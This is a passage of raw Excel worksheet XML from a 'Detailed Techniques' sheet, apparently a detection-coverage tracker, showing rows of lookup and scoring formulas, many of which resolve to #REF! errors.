      <c r="Q134" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R134" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S134" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T134" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U134" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V134" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W134" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X134" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F134&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F134))-LEN(SUBSTITUTE(TRIM(F134),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y134" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="135" spans="1:25" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A135" s="8" t="s">
        <v>12</v>
      </c>
      <c r="B135" s="8" t="s">
        <v>506</v>
      </c>
      <c r="C135" s="25" t="s">
        <v>806</v>
      </c>
      <c r="D135" s="10" t="s">
        <v>807</v>
      </c>
      <c r="E135" s="10" t="s">
        <v>808</v>
      </c>
      <c r="F135" s="10" t="s">
        <v>809</v>
      </c>
      <c r="G135" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K135,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H135" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I135" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J135" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K135" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L135" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M135" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N135" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O135" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P135" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q135" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R135" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S135" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T135" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U135" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V135" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W135" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X135" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F135&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F135))-LEN(SUBSTITUTE(TRIM(F135),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y135" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="136" spans="1:25" ht="285" x14ac:dyDescent="0.45">
      <c r="A136" s="8" t="s">
        <v>52</v>
      </c>
      <c r="B136" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C136" s="25" t="s">
        <v>810</v>
      </c>
      <c r="D136" s="10" t="s">
        <v>811</v>
      </c>
      <c r="E136" s="10" t="s">
        <v>812</v>
      </c>
      <c r="F136" s="10" t="s">
        <v>813</v>
      </c>
      <c r="G136" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K136,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H136" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I136" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J136" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K136" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L136" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M136" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N136" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O136" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P136" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q136" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R136" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S136" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T136" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U136" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V136" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W136" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X136" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F136&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F136))-LEN(SUBSTITUTE(TRIM(F136),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y136" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="137" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A137" s="8" t="s">
        <v>41</v>
      </c>
      <c r="B137" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C137" s="25" t="s">
        <v>814</v>
      </c>
      <c r="D137" s="10" t="s">
        <v>815</v>
      </c>
      <c r="E137" s="10" t="s">
        <v>816</v>
      </c>
      <c r="F137" s="10" t="s">
        <v>817</v>
      </c>
      <c r="G137" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K137,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H137" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I137" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J137" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K137" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L137" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M137" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N137" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O137" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P137" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q137" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R137" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S137" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T137" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U137" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V137" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W137" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X137" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F137&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F137))-LEN(SUBSTITUTE(TRIM(F137),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y137" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="138" spans="1:25" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A138" s="8" t="s">
        <v>191</v>
      </c>
      <c r="B138" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C138" s="25" t="s">
        <v>818</v>
      </c>
      <c r="D138" s="10" t="s">
        <v>819</v>
      </c>
      <c r="E138" s="10" t="s">
        <v>820</v>
      </c>
      <c r="F138" s="10" t="s">
        <v>821</v>
      </c>
      <c r="G138" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K138,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H138" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I138" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J138" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K138" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L138" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M138" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N138" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O138" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P138" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q138" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R138" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S138" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T138" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U138" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V138" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W138" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X138" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F138&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F138))-LEN(SUBSTITUTE(TRIM(F138),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y138" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="139" spans="1:25" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A139" s="8" t="s">
        <v>25</v>
      </c>
      <c r="B139" s="8" t="s">
        <v>497</v>
      </c>
      <c r="C139" s="25" t="s">
        <v>822</v>
      </c>
      <c r="D139" s="10" t="s">
        <v>823</v>
      </c>
      <c r="E139" s="10" t="s">
        <v>824</v>
      </c>
      <c r="F139" s="10" t="s">
        <v>825</v>
      </c>
      <c r="G139" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K139,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H139" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I139" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J139" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K139" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L139" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M139" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N139" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O139" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P139" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q139" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R139" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S139" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T139" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U139" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V139" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W139" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X139" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F139&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F139))-LEN(SUBSTITUTE(TRIM(F139),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y139" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="140" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A140" s="8" t="s">
        <v>22</v>
      </c>
      <c r="B140" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C140" s="25" t="s">
        <v>826</v>
      </c>
      <c r="D140" s="18" t="s">
        <v>827</v>
      </c>
      <c r="E140" s="10" t="s">
        <v>828</v>
      </c>
      <c r="F140" s="10" t="s">
        <v>829</v>
      </c>
      <c r="G140" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K140,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H140" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I140" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J140" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F140&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F140))-LEN(SUBSTITUTE(TRIM(F140),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K140" s="51">
